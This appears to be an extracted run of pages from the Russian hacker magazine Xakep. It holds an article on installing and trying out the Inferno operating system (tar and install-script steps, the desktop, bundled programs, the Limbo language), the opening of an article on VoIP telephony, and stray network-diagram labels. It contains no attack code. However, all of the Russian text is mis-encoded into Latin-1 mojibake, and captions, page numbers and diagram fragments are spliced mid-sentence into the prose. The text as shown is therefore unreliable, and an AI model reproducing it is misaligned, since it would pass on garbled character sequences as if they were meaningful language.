áóäóò âåñèòü îêîëî 20—30 Ìá.

Íà ìîåé ìàøèíå óñòàíîâëåíà FreeBSD 5.4, è ÿ ðåøèë óñòàíîâèòü Inferno ñíà÷àëà íà íåå. ß ñêà÷àë äèñòðèáóòèâ Inferno è àðõèâ FreeBSD.tgz ñ îôèöèàëüíîãî ñàéòà è ïðèñòóïèë ê óñòàíîâêå. Óñòàíîâêà âûãëÿäèò îäèíàêîâî äëÿ âñåõ Unix-ñèñòåì, òàê ÷òî îïèñàííóþ ìíîé ïðîöåäóðó ìîæíî áóäåò ïðèìåíèòü è ê Linux òîæå. Ñòîèò îòìåòèòü, ÷òî äëÿ óñòàíîâêè íà Linux äîñòóïíî äëÿ ñêà÷èâàíèÿ äâà îòäåëüíûõ ôàéëà: Linux.tgz è Debian.tgz. Èç-çà íåñîîòâåòñòâèÿ âåðñèé áèáëèîòåêè GLIBC ðàçðàáîò÷èêè ñêîìïèëèðîâàëè äâà ðàçíûõ óñòàíîâî÷íûõ èñïîëíÿåìûõ ôàéëà. Åñëè îäèí èç íèõ îòêàçûâàåòñÿ çàïóñêàòüñÿ, òî ñëåäóåò ïîïðîáîâàòü èñïîëüçîâàòü äðóãîé.  áóäóùåì ðàçðàáîò÷èêè íàäåþòñÿ èçáàâèòüñÿ îò ýòîãî íåäîñòàòêà è ðàñïðîñòðàíÿòü åäèíûé óñòàíîâî÷íûé àðõèâ äëÿ Linux. Ðàçðàáîò÷èêè ðåêîìåíäóþò äëÿ íà÷àëà çàâåñòè äëÿ Inferno îòäåëüíîãî ïîëüçîâàòåëÿ è ïðîèçâîäèòü óñòàíîâêó èç íåãî. ß îáîøåëñÿ áåç ýòîãî, âûïîëíèâ óñòàíîâêó èç-ïîä ñâîåãî àêêàóíòà. Íàäî ïîëîæèòü äâà àðõèâà inferno.tgz è FreeBSD.tgz â îòäåëüíûé êàòàëîã (ó ìåíÿ îí íàçûâàåòñÿ /home/amdf/inferno_install) è ðàñïàêîâàòü èõ.  Unix-ñèñòåìàõ ñëåäóåò èñïîëüçîâàòü êîìàíäó tar ñ îïöèåé -p, äëÿ òîãî ÷òîáû áûëè âûñòàâëåíû êîððåêòíûå ïðàâà äîñòóïà íà

ðàñïàêîâàííûå ôàéëû.  ìîåì ñëó÷àå ðàñïàêîâêà áóäåò âûãëÿäåòü òàê:

$ tar xzpf inferno.tgz $ tar xzpf FreeBSD.tgz

Òåïåðü òåáå íàäî ðåøèòü, êóäà áóäåò óñòàíîâëåíà Inferno. Åñëè òû ñîçäàë äëÿ Inferno îòäåëüíîãî ïîëüçîâàòåëÿ, òî ìîæåøü óñòàíîâèòü ñèñòåìó â åãî äîìàøíèé êàòàëîã. ß ïîëüçîâàòåëÿ íå ñîçäàâàë, ïîýòîìó âûáðàë äëÿ óñòàíîâêè ïóòü /usr/inferno.  óñòàíîâî÷íîì êàòàëîãå åñòü ïàïêà install, â êîòîðîé ëåæèò óñòàíîâî÷íûé ñêðèïò. Åãî èìÿ ñîâïàäàåò ñ íàçâàíèåì ïëàòôîðìû, íà êîòîðóþ ïðîèçâîäèòñÿ óñòàíîâêà.  ìîåì ñëó÷àå ñêðèïò íàçûâàåòñÿ FreeBSD386.sh. Èìåííî åãî íåîáõîäèìî çàïóñòèòü äëÿ óñòàíîâêè. Ñêðèïòó íàäî ïåðåäàòü åäèíñòâåííûé ïàðàìåòð, êîòîðûé ñîäåðæèò èìÿ êàòàëîãà, â êîòîðûé áóäåò ïðîèçâåäåíà óñòàíîâêà. Âîò êàê íàäî ýòî äåëàòü: # mkdir /usr/inferno # sh /home/amdf/inferno_install/install/FreeBSD-386.sh /usr/inferno Ñèñòåìà óñòàíîâèòñÿ â óêàçàííóþ ïàïêó. Íà ýòîì óñòàíîâêà çàêîí÷åíà.

Íà íàøåì äèñêå òû íàéäåøü äèñòðèáóòèâ Inferno Fourth Edition ñ íåîáõîäèìûìè ôàéëàìè äëÿ óñòàíîâêè íà âñå ïîääåðæèâàåìûå ïëàòôîðìû.

ÓÑÒÀÍÎÂÊÀ ÍÀ WINDOWS

Äëÿ óñòàíîâêè ïîíàäîáÿòñÿ àðõèâû inferno.tgz è Nt.tgz. Èõ ñëåäóåò ðàñïàêîâàòü â îòäåëüíûé êàòàëîã ëþáûì àðõèâàòîðîì, êîòîðûé ïîíèìàåò ôîðìàò gzip. WinRAR âïîëíå ïîäîéäåò. Íàäî ïðîñëåäèòü çà òåì, ÷òîáû ñîäåðæèìîå äâóõ àðõèâîâ áûëî ðàñïàêîâàíî îáÿçàòåëüíî â îäèí è òîò æå êàòàëîã, à íå â äâà ðàçíûõ, èíà÷å èíñòàëëÿòîð íå ñìîæåò íàéòè ñîáñòâåííûå ôàéëû. Äàëåå

èãðû Òåòðèñ è Ñàïåð

026

ñëåäóåò íàéòè â êàòàëîãå install ôàéë setup.exe è çàïóñòèòü åãî. Ïîÿâèòñÿ îêíî, â êîòîðîì ñëåäóåò ââåñòè ïóòü äëÿ óñòàíîâêè. Ïîñëå âûáîðà êàòàëîãà íàäî íàæàòü Enter, è ñèñòåìà óñòàíîâèòñÿ. Åñëè ñêà÷àòü ñ ñàéòà îáðàç çàãðóçî÷íîãî äèñêà, ñîäåðæàùåãî êîìïîíåíòû äëÿ âñåõ ïëàòôîðì ñðàçó, òî óñòàíîâêà â ýòîì ñëó÷àå íåçíà÷èòåëüíî îòëè÷àåòñÿ. Íàäî çàïèñàòü iso-îáðàç

ôàéëîâûé ìåíåäæåð è êîíñîëü

íà áîëâàíêó (èëè âèðòóàëüíî ïîäêëþ÷èòü ýòîò îáðàç â êà÷åñòâå äèñêà). Íèêàêèå àðõèâû ðàñïàêîâûâàòü íå ïðèäåòñÿ, òàê êàê êîìïàêò-äèñê óæå áóäåò ñîäåðæàòü óñòàíîâî÷íóþ äèðåêòîðèþ ñî âñåìè íåîáõîäèìûìè ôàéëàìè. Îñòàíåòñÿ òîëüêî çàéòè â ýòó ïàïêó è òî÷íî òàê æå çàïóñòèòü îòòóäà óñòàíîâî÷íûé ñêðèïò äëÿ òîé èëè èíîé ïëàòôîðìû.

ñèñòåìíûå óòèëèòû — äèñïåò÷åð çàäà÷ è äåáàããåð

XÀÊÅÐ 01 /85/ 06


Ïîñëå óñòàíîâêè ñðàçó ìîæíî çàïóñêàòü Inferno.  êàòàëîãå, êóäà áûëà óñòàíîâëåíà ñèñòåìà, äîëæíà íàõîäèòüñÿ ïàïêà ñ íàçâàíèåì ïëàòôîðìû.  íåé íàõîäÿòñÿ èñïîëíÿåìûå ôàéëû, ñðåäè êîòîðûõ åñòü ôàéë ñ èìåíåì emu (â Windows — emu.exe) — åãî è íàäî çàïóñêàòü. Ïîñëå çàïóñêà ïîÿâëÿåòñÿ êîíñîëü Inferno ñ ïðèãëàøåíèåì ââîäà â âèäå òî÷êè ñ çàïÿòîé. Òåïåðü òû ìîæåøü ââåñòè êàêóþ-íèáóäü êîìàíäó, íàïðèìåð ls, ÷òîáû ïîñìîòðåòü ñïèñîê ôàéëîâ è êàòàëîãîâ â òîì ìåñòå ôàéëîâîé ñèñòåìû, â êîòîðîé òû íàõîäèøüñÿ. Êîìàíäû Inferno âî ìíîãîì ñîâïàäàþò ñ êîìàíäàìè Unixñèñòåì, òàê ÷òî þíèêñîèäû ñîðèåíòèðóþòñÿ ñðàçó. Ðàáîòàòü ñ ãîëîé êîíñîëüþ íåèíòåðåñíî, ïîýòîìó íàäî ïîïûòàòüñÿ çàïóñòèòü ãðàôè÷åñêèé èíòåðôåéñ. Äåëàåòñÿ ýòî êîìàíäîé «; wm/wm» (äàëåå âñå êîìàíäû ñëåäóåò

ââîäèòü íåïîñðåäñòâåííî â ñàìîé Inferno).  FreeBSD â òîé æå ïàïêå, â êîòîðîé íàõîäèòñÿ emu, ëåæèò èñïîëíÿåìûé ôàéë wm. Åñëè åãî çàïóñòèòü, òî ãðàôè÷åñêèé èíòåðôåéñ ïîÿâëÿåòñÿ ñðàçó æå, ïðàâäà, ñíà÷àëà âûëåçàåò îêíî àâòîðèçàöèè. Òàì íóæíî ââåñòè ëîãèí inferno (ïàðîëÿ íåò), ïîñëå ÷åãî òîæå ïîÿâëÿåòñÿ ðàáî÷èé ñòîë. Ïðè çàïóñêå ãðàôè÷åñêîãî èíòåðôåéñà îòêðîåòñÿ íîâîå îêíî, âíóòðè êîòîðîãî áóäåò ðàáî÷èé ñòîë ñåðîãî öâåòà è ñåðàÿ æå ïàíåëü âíèçó, ñ íåêèì ïîäîáèåì êíîïêè «Ïóñê». Èíòåðôåéñ Inferno ìíå íàïîìíèë ïî÷åìó-òî Windows 98. Îôîðìëåíèå êíîïîê è îêîí ïðîñòîå, áåç ìîäíûõ çàêðóãëåííûõ óãëîâ è ïîëóïðîçðà÷íûõ ìåíþ. Çàãîëîâîê îêíà âûãëÿäèò ïðèâû÷íî: ñèíèé ïðÿìîóãîëüíèê è òðè ñòàíäàðòíûå êíîïêè ñïðàâà. Îäíàêî ïîâåäåíèå êíîïêè «ðàçâåðíóòü» îòëè÷àåòñÿ.

Òåïåðü òû ìîæåøü îòêðûòü ãëàâíîå ìåíþ Inferno è ïîçíàêîìèòüñÿ ñ íåêîòîðûìè ñòàíäàðòíûìè ïðèëîæåíèÿìè.  ìåíþ ïðèñóòñòâóþò ïóíêòû Files è Shell — ýòî ôàéëîâûé ìåíåäæåð è êîìàíäíàÿ ñòðîêà. Edit âûçûâàåò ïðîñòîé òåêñòîâûé ðåäàêòîð. Ïî ñâîèì âîçìîæíîñòÿì îí íå ïðåâîñõîäèò âèíäîâûé Notepad, åäèíñòâåííàÿ äîïîëíèòåëüíàÿ ôóíêöèÿ â íåì — ýòî ïîäñâåòêà ñèíòàêñèñà ÿçûêà Limbo. Ïóíêò Ñharon âûçûâàåò èíòåðíåò-áðàóçåð. Ïðè ââåäåíèè ëþáîãî â àäðåñíîé ñòðîêå àäðåñà ïî÷åìó-òî âñåãäà îòêðûâàëñÿ ñàéò, êîòîðûé çàïóùåí ó ìåíÿ íà ëîêàëüíîì ñåðâåðå Apache. Ñóäÿ ïî îòêðûâøåéñÿ ñòðàíèöå, áðàóçåð íå ïîääåðæèâàåò CSS è JavaScript, çàòî íîðìàëüíî ïîêàçûâàåò èçîáðàæåíèÿ è ðóññêèé òåêñò.  ïîäìåíþ System íàõîäÿòñÿ ñèñòåìíûå óòèëèòû: äåáàããåð, äèñïåò÷åð çàäà÷ è ìîíèòîð ïàìÿòè. ×àñû ïî÷åìó-òî íå ðàñïîëàãàþòñÿ íà ïàíåëè çàäà÷, êàê ýòî îáû÷íî áûâàåò, à çàïóñêàþòñÿ â âèäå îòäåëüíîãî ïðèëîæåíèÿ Clock, èç ïîäìåíþ Misc.  ýòîì æå ïîäìåíþ íàõîäèòñÿ ïðîãðàììà Colors, äåìîíñòðèðóþùàÿ äîñòóïíóþ â Inferno ïàëèòðó, à òàêæå ñòðàííîå ïðèëîæåíèå Infernal Coffee, ïðåäñòàâëÿþùåå ñîáîé îêíî ñ êàðòèíêîé, ïî êîòîðîé ïëÿøóò èçîáðàæåíèÿ êîôåéíèêîâ. Âèäèìî, ýòî äåìîíñòðàöèÿ ãðàôè÷åñêîé áèáëèîòåêè Inferno. Íó è íàêîíåö, ìåíþ Games. Òàì åñòü âñåãî äâà ïóíêòà, îäèí èç êîòîðûõ — ýòî èãðà Tetris. Äàëåêî íå âñå ïðîãðàììû Inferno ïðèñóòñòâóþò â ýòîì ìåíþ. Çàïóñêàòü îñòàëüíûå ñëåäóåò èç øåëëà Inferno. Íàïðèìåð, ÷òîáû çàïóñòèòü èãðó «Ñàïåð», ñëåäóåò íàáðàòü â êîìàíäîé ñòðîêå «; wm/sweeper». Åùå ìíå óäàëîñü íàéòè èãðû C4, «Ðåâåðñè» è «Çìåéêà». Èç ïðîãðàìì, äåìîíñòðèðóþùèõ âîçìîæíîñòè Inferno, ìîæíî âçãëÿíóòü íà Polyhedra, êîòîðàÿ ïîêàçûâàåò â òðåõìåðíîì ðåæèìå ñëîæíûå âðàùàþùèåñÿ ãåîìåòðè÷åñêèå ôèãóðû ñ íåïðîèçíîñèìûìè íàçâàíèÿìè âðîäå great ditrigonal dodecicosidodecahedron. Äëÿ ðàáîòû ñ Èíòåðíåòîì, êðîìå áðàóçåðà, åñòü åùå äâå

XÀÊÅÐ 01 /85/ 06

 Inferno ýòà êíîïêà íå ñâîðà÷èâàåò è ðàçâîðà÷èâàåò îêíî, à ïîçâîëÿåò ïîëüçîâàòåëþ ñàìîìó îïðåäåëèòü æåëàåìûé ðàçìåð îêíà. Ïðè íàæàòèè íà êíîïêó òåêóùåå îêíî îêàçûâàåòñÿ îáâåäåííûì êðàñíîé ðàìêîé. Åñëè êëèêíóòü âíóòðè îêíà è äâèãàòü ìûøêîé, óäåðæèâàÿ êëàâèøó íàæàòîé, òî ðàçìåð îêíà ìåíÿåòñÿ â òó ñòîðîíó, ê êîòîðîé áëèæå âñåãî áûë îñóùåñòâëåí êëèê. Åñëè æå êëèêíóòü çà ïðåäåëàìè îêíà, òî ìîæíî îáîçíà÷èòü âñå òîé æå êðàñíîé ðàìêîé íîâîå ðàñïîëîæåíèå è ðàçìåð îêíà. Êîãäà êíîïêà ìûøè áóäåò îòïóùåíà, îêíî çàéìåò íîâóþ ïîçèöèþ íà ýêðàíå. Ñíà÷àëà äîâîëüíî íåïðèâû÷íî, íî çàòåì ïðèâûêàåøü. Êðîìå òîãî, â äèàëîãîâûõ îêíàõ êíîïêà «OK» ðàñïîëàãàåòñÿ íå â îêíå ñðåäè ïðî÷èõ êíîïîê, à òîæå â çàãîëîâêå, ðÿäîì ñ êíîïêîé «Çàêðûòü».

ïðîãðàììû (readmail è sendmail), êîòîðûå ïðèíèìàþò è îòïðàâëÿþò ýëåêòðîííóþ ïî÷òó. Îáå ïðîãðàììû èìåþò ãðàôè÷åñêèé èíòåðôåéñ. Ïðèñóòñòâóåò òàê æå ïðîãðàììà telnet. Inferno ïîëíîñòüþ ïîääåðæèâàåò Unicode (òî, ÷òî ÿ òàê è íå íàøåë, êàê ïåðåêëþ÷èòüñÿ íà êàêîé-ëèáî ÿçûê, îòëè÷íûé îò àíãëèéñêîãî, îáúÿñíÿåòñÿ òåì, ÷òî ýòî ïðîñòî åùå íå ðåàëèçîâàíî).  ñîñòàâ Inferno âêëþ÷åíû øðèôòû ñ ïîääåðæêîé ëàòèíèöû, êèðèëëèöû, à òàêæå ãðå÷åñêîãî è ÿïîíñêîãî ÿçûêîâ. Ïðîñìîòðåòü Unicode-òàáëèöó ìîæíî â ïðîãðàììå unibrowse. Ìíå çàõîòåëîñü ïîïðîáîâàòü îòêðûòü â Inferno êàêèå-íèáóäü ïîïóëÿðíûå ôîðìàòû âèäåî, àóäèî è èçîáðàæåíèé. Äîâîëüíî áûñòðî ÿ íàøåë íóæíûå ïðîãðàììû: avi, wmplay è view. Ñíà÷àëà ÿ ïîïûòàëñÿ ïîñìîòðåòü êàêîé-íèáóäü âèäåîðîëèê. Ê ñîæàëåíèþ, íè îäèí ôàéë ïðîèãðàòü íå óäàëîñü. Ïðîèãðûâàòåëü avi, ïîñëå íàæàòèÿ íà êíîïêó play, êàæäûé ðàç âûäàâàë êàêóþ-ëèáî îøèáêó. Äàëüøå ÿ ïîïûòàëñÿ ïðîèãðàòü ìóçûêó â ôîðìàòå .wav, â ïðîãðàììå wmplay. Ê ñîæàëåíèþ, ýòîãî òîæå íå óäàëîñü ñäåëàòü, òàê êàê ïðîãðàììà íå îïîçíàëà â ïîäñóíóòîì åé ôàéëå çâóêîâîé ôîðìàò è îòêàçàëàñü ïðîèãðàòü åãî, âûäàâ ñîîáùåíèå not an audio file. Ðàçóìååòñÿ, ìîÿ íåóäà÷à íèêàê íå ñâèäåòåëüñòâóåò î òîì, ÷òî Inferno íå ïîäõîäèò äëÿ ìóëüòèìåäèéíûõ çàäà÷. Ýòî ëèøü ãîâîðèò î êà÷åñòâå ïîñòàâëÿåìîãî âìåñòå ñ ñèñòåìîé ïðîãðàììíîãî îáåñïå÷åíèÿ. Âïðî÷åì, ñ ñèñòåìîé ïîñòàâëÿåòñÿ êîìïèëÿòîð, à èñõîäíèêè áîëüøèíñòâà ñòàíäàðòíûõ óòèëèò îòêðûòû, òàê ÷òî ëþáîé ìîæåò ïåðåäåëàòü ïðîãðàììó òàê, ÷òîáû ðàáîòàëî, êàê ñëåäóåò. Çàòî ñ ôîðìàòàìè ãðàôè÷åñêèõ ôàéëîâ òàêèõ ïðîáëåì íå íàáëþäàåòñÿ. Ïðîãðàììà view ïîääåðæèâàåò ôîðìàòû gif, jpg, png, xbm è bit (à âîò ïðèâû÷íîãî âñåì bmp ïî÷åìó-òî íåò). Ïðåäëîæåííûå ïðîãðàììå ôàéëû óêàçàííûõ ôîðìàòîâ íîðìàëüíî îòêðûëèñü è îòîáðàçèëèñü.

ÐÀÁÎÒÀ Â ÎÏÅÐÀÖÈÎÍÍÎÉ ÑÈÑÒÅÌÅ

ÏÐÎÃÐÀÌÌÛ

027


PC_ZONE ///// ISSUE

ÎÁËÀÑÒÈ ÏÐÈÌÅÍÅÍÈß

Îïåðàöèîííàÿ ñèñòåìà ñïåöèàëüíî ïðîåêòèðîâàëàñü ñ ðàñ÷åòîì íà îòêðûòîñòü, ïåðåíîñèìîñòü è êîìïàêòíîñòü, à ýòî çíà÷èò, ÷òî Inferno ïðèãîäèòñÿ âåçäå, ãäå òðåáóþòñÿ ýòè ôàêòîðû. Êîìïàêòíîñòü è áîëüøîå êîëè÷åñòâî ïîääåðæèâàåìûõ ïëàòôîðì îêàæåòñÿ âåñüìà êñòàòè ïðè èñïîëüçîâàíèè âî âñòðîåííûõ ñèñòåìàõ. Ãðàôè÷åñêèé èíòåðôåéñ ïîçâîëèò èñïîëüçîâàòü Inferno â ðàçâëåêàòåëüíûõ öåëÿõ. Âíóòðåííåå óñòðîéñòâî, óïðîùàþùåå ðàáîòó ñ ñåòüþ, ïðèãîäèòñÿ äëÿ çàïóñêà ðàñïðåäåëåííûõ âû÷èñëåíèé.  îáùåì, âîçìîæíîñòè äëÿ ïðèìåíåíèÿ Inferno îòêðûâàþòñÿ øèðîêèå. Èãðîâûå è òåëåâèçèîííûå ïðèñòàâêè, ñìàðòôîíû, ìîáèëüíûå êîìïüþòåðû, áàíêîìàòû — íà âñåì ýòîì âïîëíå ìîæíî ðàáîòàòü â Inferno.

Îòêðûòîñòü ïðîåêòà ïîçâîëèò ñâîáîäíî óëó÷øàòü è ñîâåðøåíñòâîâàòü âñå âõîäÿùèå â íåå êîìïîíåíòû, à òàêæå ñâîåâðåìåííî èñïðàâëÿòü âîçíèêàþùèå îøèáêè. Îñâîèòü Inferno íå ñîñòàâèò òðóäà âñåì æåëàþùèì.  ýòîì íàì ïîìîæåò âñòðîåííûé ãðàôè÷åñêèé èíòåðôåéñ. Þíèêñîèäû íàéäóò â Inferno ñõîäíóþ ñèñòåìó êîìàíä è ïðàâ äîñòóïà ê ôàéëàì, à òàêæå îðãàíèçàöèþ ôàéëîâîé ñèñòåìû. Ïðîãðàììèñòû íà C/Ñ++/Ñ# è Java ïîëó÷àò âîçìîæíîñòü âûó÷èòü ñõîäíûé ïî ñèíòàêñèñó ÿçûê Limbo. Áåç ñîìíåíèÿ, Inferno î÷åíü èíòåðåñíûé ïðîåêò, çà êîòîðûì ñòîèò ñëåäèòü. BINARY YOUR’S z

ßÇÛÊ LIMBO ßçûê ïðîãðàììèðîâàíèÿ Limbo áûë ñîçäàí ñïåöèàëüíî äëÿ ïðîãðàììèðîâàíèÿ â ñðåäå Inferno. Îí ïðåäñòàâëÿåò ñîáîé âèäîèçìåíåííûé äèàëåêò ÿçûêà Ñè, â êîòîðûé âñòðîåíû íåêîòîðûå äîïîëíèòåëüíûå âîçìîæíîñòè äëÿ ýôôåêòèâíîãî èñïîëüçîâàíèÿ âîçìîæíîñòåé îïåðàöèîííîé ñèñòåìû. Ïðîãðàììà, íàïèñàííàÿ íà Limbo, êîìïèëèðóåòñÿ â ñïåöèàëüíûé áàéò-êîä âèðòóàëüíîé ìàøèíû DIS è ìîæåò â äàëüíåéøåì èñïîëíÿòüñÿ â ëþáîì äðóãîì ýêçåìïëÿðå Inferno, íåçàâèñèìî îò òîãî, íà êàêîé ïëàòôîðìå ýòà îïåðàöèîííàÿ ñèñòåìà áóäåò çàïóùåíà. Ïðîãðàììà íà Limbo ñîñòîèò èç ìîäóëåé, êîòîðûå ïîäêëþ÷àþòñÿ ñ ïîìîùüþ äèðåêòèâû include, ïî÷òè òàê æå, êàê è â Ñè. Ìîäóëü ñîñòîèò èç äâóõ ñåêöèé, îäíà èç êîòîðûõ ñîäåðæèò äåêëàðàöèè ôóíêöèé, à äðóãàÿ - èõ ðåàëèçàöèè. Inferno èìååò ñîáñòâåííîå API, èñïîëüçîâàòü êîòîðîå ìîæíî, ïîäêëþ÷àÿ ê ïðîãðàììå ôàéëû ìîäóëåé ñ ðàñøèðåíèåì *.m. Ïîäðîáíåå î ïðîãðàììèðîâàíèè íà ÿçûêå Limbo ìîæíî ïîçíàêîìèòüñÿ íà ñòðàíèöå www.vitanuova.com/inferno/limbo.html.

Îôèöèàëüíàÿ ñòðàíèöà Inferno — www.vitanuova.com/inferno. ßçûê Limbo — www.vitanuova.com/inferno/limbo.html. Ñàéò íà ðóññêîì ÿçûêå, ïîñâÿùåííûé îïåðàöèîííûì ñèñòåìàì Inferno è Plan9, — http://plan9inferno.narod.ru.

èíòåðíåò-áðàóçåð Charon è ïðîãðàììà Readmail

028

èñõîäíûé êîä íà ÿçûêå Limbo

XÀÊÅÐ 01 /85/ 06


PC_ZONE PC_ZONE ///// ISSUE

ÏÐÎÙÀÉ, ÒÅËÅÔÎÍÍÀß ÑÅÒÜ

äåâàéñ äëÿ ïîäêëþ÷åíèÿ ê VoIP ñ îáû÷íîãî òåëåôîíà. Äðóãèìè ñëîâàìè, àíàëîãî-öèôðîâîé ïðåîáðàçîâàòåëü

TEXT ÑÒÅÏÀÍ ÈËÜÈÍ / STEP@GAMELAND.RU /

ÎÁÙÅÍÈÅ ÃÎËÎÑÎÌ ×ÅÐÅÇ ÈÍÅÒ ÓÆÅ ÄÀÂÍÎ ÍÅ ÄÈÊÎÂÈÍÊÀ. ÇÀ ÏÎÑËÅÄÍÈÉ ÃÎÄ ÍÀÌ ÂÑÅ ÓØÈ ÏÐÎÆÓÆÆÀËÈ ÏÎ ÏÎÂÎÄÓ ×ÓÄÎ-ÏÐÎÃÐÀÌÌÛ SKYPE È ÅÅ ÌÍÎÃÎ×ÈÑËÅÍÍÛÕ ÀÍÀËÎÃÎÂ, ÊÎÒÎÐÛÅ ÏÎ×ÅÌÓ-ÒÎ ÑÒÀËÈ ÏÎßÂËßÒÜÑß ÊÀÊ ÃÐÈÁÛ ÏÎÑËÅ ÄÎÆÄß. ÂÎ ÂÑÅÕ ÊÐÓÏÍÛÕ ÃÎÐÎÄÀÕ ÑÅÉ×ÀÑ ÐÀÁÎÒÀÅÒ ÑÐÀÇÓ ÍÅÑÊÎËÜÊÎ ÀËÜÒÅÐÍÀÒÈÂÍÛÕ ÎÏÅÐÀÒÎÐΠÑÂßÇÈ, ÏÐÅÄÎÑÒÀÂËßÞÙÈÕ ÓÑËÓÃÈ ÌÅÆÄÓÍÀÐÎÄÍÎÉ È ÌÅÆÄÓÃÎÐÎÄÍÅÉ ÑÂßÇÈ ÏÎ ×ÐÅÇÂÛ×ÀÉÍÎ ÍÈÇÊÈÌ ÒÀÐÈÔÀÌ. À  ÎÔÈÑÀÕ ÂÑÅ ×ÀÙÅ ÌÎÆÍÎ ÂÑÒÐÅÒÈÒÜ ÒÅËÅÔÎÍÛ, Ê ÊÎÒÎÐÛÌ ÂÌÅÑÒÎ ÎÁÛ×ÍÎÃÎ ÒÅËÅÔÎÍÍÎÃÎ ÊÀÁÅËß ÏÎÄÊËÞ×ÅÍÀ ÂÈÒÀß ÏÀÐÀ.  ÝÒÎÌ ÍÅÒ ÍÈ×ÅÃÎ ÓÄÈÂÈÒÅËÜÍÎÃÎ: ÒÅÕÍÎËÎÃÈß VOIP ÍÀÁÈÐÀÅÒ ÎÁÎÐÎÒÛ, ÏÐÈ×ÅÌ ÂÎ ÂÑÅÕ ÑÂÎÈÕ ÏÐÎßÂËÅÍÈßÕ ÑÐÀÇÓ

ÑÓÒÜ ÒÅÕÍÎËÎÃÈÈ VOIP ÍÀ ÏÀËÜÖÀÕ ÏÎÇÍÀÊÎÌÜÑß, VOIP

030

Àááðåâèàòóðà VoIP — ýòî ñîêðàùåíèå îò Voice over IP. Ñâîåîáðàçíàÿ íàäñòðîéêà íàä ðàñïðîñòðàíåííûì ïðîòîêîëîì TCP/IP, ïîçâîëÿþùàÿ ñ ïîìîùüþ IP-ïàêåòîâ ïåðåäàâàòü îöèôðîâàííûé ãîëîñ. Åå íå ïåðâûé ãîä èñïîëüçóþò äëÿ îðãàíèçàöèè îáùåíèÿ ÷åðåç èíåò â ðåàëüíîì âðåìåíè, ïîýòîìó íîâîé ýòó ðàçðàáîòêó íå íàçîâåøü. Ïàêåò ñ ãîëîñîì ïðè ñîáëþäåíèè íåêîòîðûõ óñëîâèé (äîñòàòî÷íîé øèðèíû êàíàëà, ìèíèìàëüíûõ çàäåðæåê è ò.ï.) âïîëíå óñïåøíî òðàíñïîðòèðóþòñÿ ÷åðåç Èíòåðíåò, ÷òî ïðåäîñòàâëÿåò âîçìîæíîñòü áûñòðî è äåøåâî íàëàäèòü ñâÿçü ìåæäó ëþáûìè àáîíåíòàìè, äàæå åñëè îäèí èç íèõ íàõîäèòñÿ â Çèìáàáâå, à äðóãîé — íà Àëÿñêå. Ãëàâíîå, ÷òîáû êàæäûé èç íèõ èìåë ñòàáèëüíûé èíòåðíåò-êàíàë. Åìêîñòü òåëåôîííûõ ñòàíöèé ñèëüíî îãðàíè÷åíà. Ïîñëå ïåðåõîäà íà öèôðîâûå ÀÒÑ ýòî ñòàëî ìåíåå çàìåòíî, íî íåñêîëüêî ëåò íàçàä äîçâîíèòüñÿ â íóæíîå ìåñòî, ñêàæåì, ïîä Íîâûé ãîä, áûëî êðàéíå ïðîáëåìàòè÷íî. «Äàííîå íàïðàâëåíèå ïåðåãðóæåíî» — õîðîøî çíàêîìàÿ ôðàçà äëÿ òåõ, êòî ÷àñòî çâîíèò ïî ìåæãîðîäó. Èíòåðíåò, à çíà÷èò, è VoIP ïîäîáíûõ îãðàíè÷åíèé íå èìååò. Àêòèâíîå èñïîëüçîâàíèå äèíàìè÷åñêîé ìàðøðóòèçàöèè ïðèâîäèò ê òîìó, ÷òî

ïóòü ñëåäîâàíèÿ ïàêåòà îò îäíîãî óçëà ê äðóãîìó íå âñåãäà îñòàåòñÿ ïîñòîÿííûì, îñîáåííî åñëè ðàññìàòðèâàåìûå óçëû òåððèòîðèàëüíî äàëåêè äðóã îò äðóãà. Åñëè ïî êàêîìó-òî íàïðàâëåíèþ êàíàë ñèëüíî çàãðóæåí, òî óìíûå ìàðøðóòèçàòîðû ìîãóò âûáðàòü äðóãîé ïóòü ñëåäîâàíèÿ ïàêåòîâ, êîòîðûé â äàííûé ìîìåíò áóäåò îïòèìàëüíûì. Âàæíà åùå îäíà äåòàëü. Ïàêåòû ñ ãîëîñîì (êàê, âïðî÷åì, è âñå îñòàëüíûå) íèêîãäà íå ïåðåäàþòñÿ ïî îäíèì è òåì æå êàíàëàì: îíè âñåãäà ðàñïðåäåëåíû ñðåäè áåñ÷èñëåííîãî êîëè÷åñòâà ðàçíîîáðàçíûõ ìàðøðóòîâ. Îãðîìíûé ïëþñ IP-òåëåôîíèè â òîì, ÷òî îíà çíà÷èòåëüíî äåøåâëå òðàäèöèîííîé, îñîáåííî åñëè ðå÷ü èäåò î ìåæäóíàðîäíûõ çâîíêàõ. Îáû÷íûå òåëåôîííûå êîìïàíèè â áîëüøèíñòâå ñâîåì ÿâëÿþòñÿ ìîíîïîëèñòàìè, ïîýòîìó óñòàíàâëèâàþò äîâîëüíî âûñîêèå òàðèôû. Áîëåå òîãî, öåíà çâîíêà çàâèñèò îò òîãî, êòî çâîíèò, êóäà, îòêóäà, êîãäà è êàêèì îáðàçîì. Òàðèô âîçðàñòàåò äèñêðåòíî: áëèæå — äåøåâëå, äàëüøå — äîðîæå. ×òî êàñàåòñÿ VoIP, òî ãðàíèöà ìåæäó âíóòðèãîðîäñêèìè çâîíêàìè è ìåæäóãîðîäíèìè âåñüìà ïðîçðà÷íà, òàê êàê VoIP-îïåðàòîð ïåðåäàåò âñå ïî îòíîñèòåëüíî äåøåâûì èíòåðíåò-êàíàëàì.

XÀÊÅÐ 01 /85/ 06


PC1

PC2

SERVER

SERVER

WAN

LEASED LINE SWITCH

WAN ROUTER

DESCRIPTIONN COUNT

LEGEND

MODEM

2

PBX

SWITCH

2

SERVER

2

LEASED LINE MODEM LEASED LINE

EXT. 101

EXT. 201

EXT. 102

EXT. 202

EXT. 103

EXT. 203

EXT. 104

EXT. 204

PBX

2

PC1

WAN ROUTER

PBX

SWITCH

VOIP-FXS

PC

TELEPHONE

4

8

ROUTER

2

SYMBOL

LEGEND SUBTITLE

VOIP-FXO

MODEM LEASED LINE

PC2

